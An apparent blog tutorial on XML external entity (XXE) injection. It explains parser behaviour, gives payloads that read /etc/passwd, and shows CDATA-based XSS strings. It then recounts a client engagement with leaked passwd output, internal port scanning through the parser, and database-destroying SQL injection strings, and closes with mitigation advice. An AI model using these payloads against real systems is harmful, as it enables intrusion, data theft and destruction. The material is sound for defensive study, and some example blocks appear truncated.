Infiltrating corporate networks using XXE injection


External entity injection is, generally speaking, a type of XML injection that allows an attacker to force a badly configured XML parser to "include" or "load" unwanted functionality that compromises the security of a web application. Nowadays it is rare to find this type of security issue. This type of attack has been well documented and known since 2002.

XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.

An XXE (XML eXternal Entity) attack is usually an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. The application may be coerced to open arbitrary files and/or TCP connections, e.g. to embed data from outside the main file into an XML document. A successful XXE injection attack could allow an attacker to access the operating system's file system, cause a DoS, or inject JavaScript (e.g. perform an XSS attack).

How the XML parser works (based on W3C Recommendation 26 November 2008)

When an XML processor recognizes a reference to a parsed entity, in order to validate the document, the processor MUST include its replacement text. If the entity is external, and the processor is not attempting to validate the XML document, the processor MAY, but need not, include the entity's replacement text. If a non-validating processor does not include the replacement text, it MUST inform the application that it recognized, but did not read, the entity.

This rule is based on the recognition that the automatic inclusion provided by the SGML and Extensible Markup Language (XML) entity mechanism, primarily designed to support modularity in authoring, is not necessarily appropriate for other applications, in particular document browsing. Browsers, for example, when encountering an external parsed entity reference, might choose to provide a visual indication of the entity's presence and retrieve it for display only on demand.

When an entity reference appears in an attribute value, or a parameter entity reference appears in a literal entity value, its replacement text MUST be processed in place of the reference itself as though it were part of the document at the location the reference was recognized, except that a single or double quote character in the replacement text MUST always be treated as a normal data character and MUST NOT terminate the literal.

How the XML parser handles XXEs

The system identifier of an XXE is meant to be converted to a Uniform Resource Identifier (URI) reference (as defined in IETF RFC 3986), as part of the process of dereferencing it to obtain input for the XML processor to construct the entity's replacement text. It is an error for a fragment identifier (beginning with a # character) to be part of a system identifier. Unless otherwise provided by information outside the scope of this article (or a processing instruction defined by a particular application specification), relative URIs are relative to the location of the resource within which the entity declaration occurs.

This is defined to be the external entity containing the '<' which starts the declaration, at the point when it is parsed as a declaration. A URI might thus be relative to the document entity, to the entity containing the external Document Type Definition (DTD) subset, or to some other external parameter entity. Attempts to retrieve the resource identified by a URI may be redirected at the parser level (for example, in an entity resolver) or below (at the protocol level, for example, via an HTTP Location: header).
Note: A Document Type Definition defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. A DTD can be declared in line inside an XML document, or as an external reference.

In the absence of additional information outside the scope of this specification within the resource, the base URI of a resource is always the URI of the actual resource returned. In other words, it is the URI of the resource retrieved after all redirection has occurred.
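The resolution rules above can be sketched in a few lines of Python. This is only an illustration, not how any particular XML parser is implemented: the function name resolve_system_identifier and the example.org URLs are assumptions made up for the example, and the standard library's urljoin stands in for the RFC 3986 resolution step.

```python
from urllib.parse import urljoin, urlsplit


def resolve_system_identifier(base_uri: str, system_id: str) -> str:
    """Resolve a (possibly relative) system identifier against a base URI.

    base_uri is the URI of the resource that contains the entity
    declaration, taken after all redirection has occurred.
    """
    # A fragment identifier (#...) is an error in a system identifier.
    if urlsplit(system_id).fragment:
        raise ValueError("system identifier must not contain a fragment")
    # Relative identifiers are relative to the declaring resource.
    return urljoin(base_uri, system_id)


# Hypothetical base: a DTD fetched from http://example.org/dtds/main.dtd
print(resolve_system_identifier("http://example.org/dtds/main.dtd",
                                "chapters/intro.ent"))
print(resolve_system_identifier("http://example.org/dtds/main.dtd",
                                "/etc/passwd"))
```

Note how an absolute path such as /etc/passwd still resolves against the scheme and host of the declaring resource; it only points at the local file system when the base itself is a local file.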

An actual example of XXE

Based on what has already been explained about how the XML parser handles XXE, in the following example the XML document will make an XML parser read /etc/passwd and expand it into the content of the PutMeHere tag:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE PutMeHere [
  <!ELEMENT PutMeHere ANY>
  <!ENTITY xxe SYSTEM "/etc/passwd">
]>
<PutMeHere>&xxe;</PutMeHere>

See how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the PutMeHere tag will be the content of /etc/passwd. If the above XML input is fed to a badly configured XML parser, the passwd file is going to be loaded.
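For contrast, here is a small sketch of what a parser that does not resolve external entities does with the same kind of document. It assumes CPython's standard xml.etree.ElementTree module, which is documented as not expanding external entities and raising a ParseError when it meets such a reference; the helper name try_parse is made up for the example.

```python
import xml.etree.ElementTree as ET

# Same structure as the example above, held in a string.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE PutMeHere [
  <!ELEMENT PutMeHere ANY>
  <!ENTITY xxe SYSTEM "/etc/passwd">
]>
<PutMeHere>&xxe;</PutMeHere>"""


def try_parse(document: str) -> str:
    """Parse the document and report whether the entity was expanded."""
    try:
        root = ET.fromstring(document)
    except ET.ParseError as exc:
        # The external entity is never fetched; the reference is an error.
        return f"rejected: {exc}"
    return f"parsed: {root.text!r}"


print(try_parse(DOCUMENT))
```

A parser that is vulnerable would instead return the file content as the text of PutMeHere, which is exactly the behaviour a test should look for.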

Note: The XML document is not well-formed if the entity reference does not start with the '&' character and end with the ';' character, as in &xxe;.

Note: The attack is limited to files containing text that the XML parser will allow at the place where the External Entity is referenced. Files containing non-printable characters, and files with randomly located less than signs or ampersands, will not be included. This restriction greatly limits the number of possible target files.
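The restriction can be illustrated with a rough simulation. The sketch below does not fetch anything; it simply pastes some text where the entity reference would be and asks Python's standard ElementTree parser whether the result is still well-formed. The function name survives_inclusion and the sample strings are assumptions for the example.

```python
import xml.etree.ElementTree as ET


def survives_inclusion(file_text: str) -> bool:
    """Return True if file_text could replace an entity reference
    inside element content without breaking well-formedness."""
    candidate = "<PutMeHere>" + file_text + "</PutMeHere>"
    try:
        ET.fromstring(candidate)
    except ET.ParseError:
        return False
    return True


# A passwd-style line is plain text and passes.
print(survives_inclusion("root:x:0:0:root:/root:/bin/bash\n"))
# Stray '<' and '&' characters are read as broken markup.
print(survives_inclusion("if a < b && c"))
# Control characters are not legal XML 1.0 characters.
print(survives_inclusion("binary\x07data"))
```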

Identifying XXE attack strings

The following table contains attack strings that can help someone break the XML schema and cause the XML parser to return possibly verbose errors, which in turn help you identify the XML structures.

14<![CDATA[ / ]]>

Note: CDATA section delimiters: <![CDATA[ / ]]> - CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. In other words, characters enclosed in a CDATA section are not parsed by an XML parser.
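A short Python sketch shows the effect of a CDATA section, using the standard xml.etree.ElementTree module; the note element name is only an assumption for the example.

```python
import xml.etree.ElementTree as ET

# Everything between <![CDATA[ and ]]> is taken as character data.
root = ET.fromstring("<note><![CDATA[<b>5 < 6 & 7 > 2</b>]]></note>")

# The <b> tag was never parsed as an element, so there are no children.
print(len(root))
# The text keeps the raw '<', '&' and '>' characters.
print(root.text)
```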

Exploiting XXE vulnerabilities

Let's suppose there is a web application that uses XML-style communication to perform user login. This is done by creating and adding a new <user> node to an xmlDb file. We will try to inject into the XML schema that handles the XML login. For our example we will use the following messages. Some or all of the following attempts will generate an XML error, helping us to understand the XML schema of the XMLdb.

Valid XML request:

<?xml version="1.0" encoding="ISO-8859-1"?>

Note: A valid XML request for a user log-in.

1st Example

<?xml version="1.0" encoding="ISO-8859-1"?>

Note:  Simple XML injection using an arrow character.

2nd Example

<?xml version="1.0" encoding="ISO-8859-1"?>

Note:  Simple XML injection with half malformed html comment injected.

3rd Example

<?xml version="1.0" encoding="ISO-8859-1"?>

Note:  Simple XML injection using a reverse arrow character.

4th Example

<?xml version="1.0" encoding="ISO-8859-1"?>

Note: This sequence of characters is interpreted as the beginning or end of a comment. Injecting one of them into the user name, for example Username = user1<!--, makes the application generate an XML message that contains an unterminated comment.
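The effect can be reproduced with a small sketch. The message layout below is hypothetical: only the <user> and <username> names come from this article, while the <password> element and the helper names build_login_message and parser_error are assumptions for the example. The application is assumed to build the message by plain string concatenation.

```python
import xml.etree.ElementTree as ET
from typing import Optional


def build_login_message(username: str, password: str) -> str:
    """Hypothetical server-side template that concatenates user input."""
    return (f"<user><username>{username}</username>"
            f"<password>{password}</password></user>")


def parser_error(xml_text: str) -> Optional[str]:
    """Return the parser's error text, or None if the message is well-formed."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return str(exc)
    return None


# A normal user name produces a well-formed message.
print(parser_error(build_login_message("user1", "secret")))
# The injected "<!--" opens a comment that is never closed.
print(parser_error(build_login_message("user1<!--", "secret")))
```

When the application echoes such parser errors back, their wording and position hints are what reveal the surrounding XML structure.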


5th Example

<?xml version="1.0" encoding="ISO-8859-1"?>
  <username>user1 <![CDATA[ / ]]> </username>

Note: Simple CDATA injection attempt. When a CDATA section is used, the characters enclosed by it are not parsed as markup by the XML parser.

6th Example

<?xml version="1.0" encoding="ISO-8859-1"?>
  <username>user1<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]> </username>

Note: XSS injected through an XML parser. This is another test related to the CDATA tag. When the XML document is parsed, the CDATA delimiters are removed and only the enclosed characters remain, so it is possible to add a script if the tag contents are later shown in an HTML page.
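The reassembly can be observed with Python's standard ElementTree parser. The sketch below parses the username element from the 6th example and then shows one possible defence, escaping the value with html.escape before it is written into a page; treating the value this way is an assumption about how the application renders it.

```python
import html
import xml.etree.ElementTree as ET

PAYLOAD = ("<username>user1<![CDATA[<]]>script<![CDATA[>]]>alert('xss')"
           "<![CDATA[<]]>/script<![CDATA[>]]> </username>")

# After parsing, the CDATA delimiters are gone and the pieces are joined.
username = ET.fromstring(PAYLOAD).text
print(username)

# Escaping before output turns the markup back into harmless text.
safe_username = html.escape(username)
print(safe_username)
```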

A more complex scenario for exploiting XXE attacks (a real attack scenario)

As already mentioned, XXE attacks can result in read access to files on the OS, a side effect that some would say is similar to a path traversal attack. A more complex scenario would be a sophisticated application that performs e-banking transactions and uses the browser as a thin client that consumes the web service after, of course, a successful login. So let's assume that the transaction XML message carries the user name and password back and forth (yes, I have seen that) in order to perform the transaction.

Client request (XML message used to perform the transaction for the client user name with password userpass1):

<?xml version="1.0" encoding="ISO-8859-7"?>
  <fixedPayment organizationId="44" productId="61" clientId="33333333" paymentId="3"      referenceDate="2008-05-12" paymentDate="20-11-25">
        <amount currency="EUR">100,1</amount>
     <description>costumer description</description>

Explanation: All information needed for the transaction is encapsulated inside the XML message.

Server response (no XXE injection performed):

<?xml version="1.0" encoding="ISO-8859-7"?>
  <!DOCTYPE webapp SYSTEM "http://webapp.gr/app/app.dtd">
  <webapp> <status code="200" text="OK"/>
    <fixedPayment organizationId="44" productId="61" clientId=" 33333333 " paymentId="3"      paymentDate="2009-11-25" referenceDate="2008-05-12" dateCreated="2012-03-12T15:55:06"  lastModified="2012-03-12T15:55:06" >
             <amount currency="EUR" >100,1</amount>
             <description>costumer description</description>
      <paymentStatus code="14" text="Successful transaction" />

Explanation: An HTTP 200 code is returned along with the success message for the transaction.

Client request (XML message with successful XXE injection):

<?xml version="1.0" encoding="ISO-8859-7"?><!DOCTYPE foo [<!ENTITY xxefca0a SYSTEM "file:///etc/passwd"> ]>
  <fixedPayment organizationId="44" productId="61" clientId="33333333" paymentId="1"      referenceDate="2005-05-12" paymentDate="23-11-22">
        <amount currency="EUR">100,1</amount>
     <description>costumer description</description>

Explanation: See the principal tag and the XXE declaration after the XML version tag. The returned message is embedded along with the principal tag, so the response will contain the passwd file along with the success or error message inside the principal tag.

Server response (with successful XXE injection performed):

HTTP/1.1 400 ???????????: ??? ??????? xxxxxxx ?? ????? ?????? username1sroot:x:0:0:MPORTAL root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
bash xxx:x:503:503::/var/home/xxx:/bin/bash mfamar:x:504:100:xxx BE Agent:/home/mfamar:/bin/bash xxxx:x:505:505::/home/xxxx:/bin/bash xxx:x:506:506::/home/xxxx:/bin/bash jboss:x:xxx:xxx:JBossAS:/usr/share/jbossas:/bin/sh
Date: Mon, 12 Mar 2011 12:00:45 GMT
Server: Apache/xxxx (Red Hat)
Set-Cookie: JSESSIONIDSSO=xxxxxxxxxxxx; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 7163
<html><head><title>Apache Tomcat/xxx - Error report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} H3{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} BODY{font-family : sans-serif,Arial,Tahoma;color : black;background-color : white;} B{color : white;background-color : #0086b2;} HR{color : #0086b2;} --></STYLE> </head><body><h1>HTTP Status 400 - ???????????: ??? ??????? franchisor ?? ????? ?????? username1root:x:0:0:MPORTAL root:/root:/bin/bash
xxx:x:101:101:JBossAS:/usr/share/jbossas:/bin/sh).</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/xx.xx</h3></body></html>jboss:x:xxx:xxx:JBossAS:/usr/share/jbossas:/bin/sh).</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/x.x</h3></body></html>

Explanation: The response is an HTTP 400 error page that embeds the passwd file of the Linux box hosting the vulnerable web application. Notice the passwd entries (root, bin, daemon and so on) inside the error text.

The attack scenario

The XXE attack described above is actually a very realistic attack scenario that I performed against one of my clients and then reproduced in my own lab. Since this article has more than 1000 page views, I thought it would be a good idea to update it with more information on how someone can escalate the attack to become more sophisticated. Here is a primitive diagram of what happened:

Note: As you can see from the vulnerable web application you can issue http requests and start looking for other web servers.

The next step would be to map the outbound local firewall rules to see what traffic is allowed to go out. In order to do that you would have to try to access hosts that exist and reply back (e.g. complete a TCP SYN, SYN/ACK exchange through the machine you use to proxy the XXE requests), so the first thing to do would be to download the hosts file of the compromised web server and then start forwarding traffic to these machines. As soon as you get a response back you know that the specific machine is actively responding to your HTTP requests. Then you start rotating through all ports and identify the target machine ports replying back to you (e.g. http://replyback.com:1, then http://replyback.com:2, and so on, increasing the port number until you reach the highest port). That way you map all egress filtering done by the local firewall of the XXE proxy. You also have to learn the IDS/IPS threshold, unless of course you are doing an authorized penetration test.

You should be aware that the XML parser only returns a small chunk of the data back to you (which means that you would have to identify the OS firewall rules from shortened versions of the true error messages). See the diagram below explaining the test:

Note: The next step after mapping the local firewall rules would be to start fingerprinting the surrounding web servers by using the DirBuster directory list, or to escalate further and use HTTPS to fingerprint the web servers based on the SSL errors returned, and then deliver an msfpayload or perform a path traversal or SQL injection attack through the XML parser (it is not as simple as it sounds).

Tools to use to perform this attack 

The only tools you would need to perform this attack are the free version of Burp Proxy (the Burp Intruder tool and the Burp Repeater tool), openssl (e.g. issue the openssl s_client -connect command), the DirBuster directory list and the fuzzdb list (for proper ammunition). The following screenshot shows how you can do it:

 Note: See how I added the payload position and that I used the sniper mode.

Destroying surrounding machines

A malicious attacker taking advantage of this attack can actually blindly start launching database shutdown SQL injection attacks through the parser. A way to do that would be to issue a:
  1. ';shutdown --
  2. DROP sampletable;--
Note: Fingerprinting the back-end database is also possible.

Stealing data from surrounding machines 

Another interesting thing someone can do with proxied XXE HTTP requests is to try to identify unprotected web admin panels and file shares through, for example, UNC paths or syslog daemons. Imagine how interesting it would be to connect to a web proxy syslog daemon through 553 and try to sniff all the traffic of the network.

More on what can you do with a successful XXE attack
  1. The attacker can use the application as a proxy, retrieving sensitive content from any web servers that the application can reach, including those running internally within the organization on private and non-routable address space (e.g. perform database web administration panel retrieval).
  2. The attacker can exploit vulnerabilities on back-end web applications, provided that these can be exploited via URIs (e.g. perform web directory brute forcing and fingerprint web servers, perform SQL injections or path traversal attacks, etc.).
  3. The attacker can test for open ports on back-end systems by cycling through large numbers of IP addresses and port numbers. In some cases, timing differences can be used to infer the state of a requested port. In other cases, the service banners from some services may actually be returned within the application responses.
  4. The attacker can use the XXE-vulnerable web server to map firewall rules on other company extranets.
  5. The attacker might be able to DoS internal company web server machines.
  6. The attacker might be able to hide his/her traces by mixing port scans with the fake traffic that the vulnerable web server generates through outbound XXE requests.

Mitigation of XXE vulnerabilities

The XML parser should not follow URIs to external entities, or should only follow known good URIs (whitelisted URIs). With some parsers, disabling XXE requires setting setExpandEntityReferences to false, but note that this doesn't do what you expect for some of the XML parsers out there.

XML external entity injection makes use of the DOCTYPE tag to define the injected entity. XML parsers can usually be configured to disable support for this tag. You should consult the documentation for your XML parsing library to determine how to disable this feature. It may also be possible to use input validation to block input containing a DOCTYPE tag.
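As a rough sketch of that idea in Python, the function below refuses any document that carries a DOCTYPE declaration before handing it to the normal parser. It uses the standard xml.parsers.expat module and its StartDoctypeDeclHandler callback; the names DoctypeForbidden and parse_without_doctype are made up for the example, and the two-pass approach is a simplification rather than a recommendation for any specific library.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when the input contains a DOCTYPE declaration."""


def parse_without_doctype(xml_text: str) -> ET.Element:
    """Parse xml_text, but reject it if it declares a DOCTYPE."""

    def reject(name, system_id, public_id, has_internal_subset):
        # Called by expat as soon as "<!DOCTYPE" is recognised.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    # First pass: scan the document only to detect a DOCTYPE.
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = reject
    checker.Parse(xml_text, True)

    # Second pass: build the tree from input known to have no DTD.
    return ET.fromstring(xml_text)


request = "<user><username>user1</username></user>"
print(parse_without_doctype(request).find("username").text)
```

Because no DOCTYPE ever reaches the second parser, no entity of any kind can be declared by the sender, which also covers internal entity expansion tricks.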


Very simplistically speaking, when an application is vulnerable to XXE the attacker might be able to gain access to the web server's OS file system, cause a DoS by requesting the /dev/random file, launch an SQL injection attack, or even perform an XSS attack.